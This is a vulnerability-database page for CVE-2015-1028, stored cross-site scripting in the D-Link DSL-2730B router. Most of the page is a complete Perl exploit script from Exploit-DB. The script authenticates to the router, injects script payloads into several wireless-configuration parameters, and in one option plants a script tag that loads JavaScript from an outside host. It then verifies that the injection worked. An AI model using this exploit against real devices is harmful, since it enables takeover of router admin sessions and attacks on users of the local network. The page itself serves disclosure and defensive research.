CVE-2015-1028
Description
Multiple cross-site scripting (XSS) vulnerabilities in D-Link DSL-2730B router (rev C1) with firmware GE_1.01 allow remote authenticated users to inject arbitrary web script or HTML via the (1) domainname parameter to dnsProxy.cmd (DNS Proxy Configuration Panel); the (2) brName parameter to lancfg2get.cgi (Lan Configuration Panel); the (3) wlAuthMode, (4) wl_wsc_reg, or (5) wl_wsc_mode parameter to wlsecrefresh.wl (Wireless Security Panel); or the (6) wlWpaPsk parameter to wlsecurity.wl (Wireless Password Viewer).
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or β if you've already worked around this in production β publish your fix to the community-verified tier.
β Propose a mitigation on Community β Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
D-Link DSL-2730B Modem - 'Lancfg2get.cgi Persistent Cross-Site Scripting
D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored DnsProxy.cmd
D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Wlsecrefresh.wl & Wlsecurity.wl
# Exploit Title: D-Link DSL-2730B Modem wlsecrefresh.wl & wlsecurity.wl Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in wlsecrefresh.wl
# Developed by Mauricio CorrΓͺa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More informations: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;
my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
my $opt = $ARGV[3];
$ip = $1 if($ip=~/(.*)\/$/);
if (@ARGV != 4){
print "\n";
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "Usage: perl $0 http:\/\/host_ip\/ user pass option\n";
print "\n";
print "Options: 1 - Parameter: wlAuthMode \n";
print " 2 - Parameter: wl_wsc_reg \n ";
print " 3 - Parameter: wl_wsc_mode \n";
print " 4 - Parameter: wlWpaPsk (Execute on click to exibe Wireless password) \n";
}else{
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploring $ip\/ ...\n";
my $payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
my $ua = new LWP::UserAgent;
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
$hdrs->authorization_basic($user, $pass);
chomp($ip);
print "[+] Preparing...\n";
my $url_and_payload = "";
if($opt == 1){
$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=1$payload".
"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
}elsif($opt == 2){
$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled$payload&wlAuth=0&wlAuthMode=997354".
"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
}elsif($opt == 3){
$payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled$payload&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=997354".
"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
}elsif($opt == 4){
$payload = "GameOver%3Cscript%20src%3D%22http%3A%2f%2fxlabs.com.br%2fxssi.js%22%3E%3C%2fscript%3E";
$url_and_payload = "$ip/wlsecurity.wl?wl_wsc_mode=enabled&wl_wsc_reg=disabled&wsc_config_state=0&wlAuthMode=psk%20psk2&wlAuth=0&".
"wlWpaPsk=$payload&wlWpaGtkRekey=0&wlNetReauth=36000&wlWep=disabled&wlWpa=aes&wlKeyBit=0&wlPreauth=0&".
"wlSsidIdx=0&wlSyncNvram=1";
}else{
print "[-] Chose one option!\n";
exit;
}
my $req = new HTTP::Request("GET",$url_and_payload,$hdrs);
print "[+] Prepared!\n";
print "[+] Requesting...\n";
my $resp = $ua->request($req);
if ($resp->is_success){
print "[+] Successfully Requested!\n";
my $resposta = $resp->as_string;
print "[+] Checking for properly explored...\n";
my $url = "$ip/wlsecurity.html";
$req = new HTTP::Request("GET",$url,$hdrs);
print "[+] Checking that was explored...\n";
my $resp2 = $ua->request($req);
if ($resp2->is_success){
my $result = $resp2->as_string;
if($opt == 4){
$payload = "%27GameOver%3Cscript%20src%3D%5C%22http%3A%2f%2fxlabs.com.br%2fxssi.js%5C%22%3E%3C%2fscript%3E%27";
}
if(index($result, uri_unescape($payload)) != -1){
print "[+] Successfully Exploited!";
}else{
print "[-] Not Exploited!";
}
}
}else {
print "[-] Ops!\n";
print $resp->message;
}
}References
- http://www.exploit-db.com/exploits/35747
- http://www.exploit-db.com/exploits/35750
- http://www.exploit-db.com/exploits/35751
- http://www.xlabs.com.br/blog/?p=339
- http://www.exploit-db.com/exploits/35747
- http://www.exploit-db.com/exploits/35750
- http://www.exploit-db.com/exploits/35751
- http://www.xlabs.com.br/blog/?p=339
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.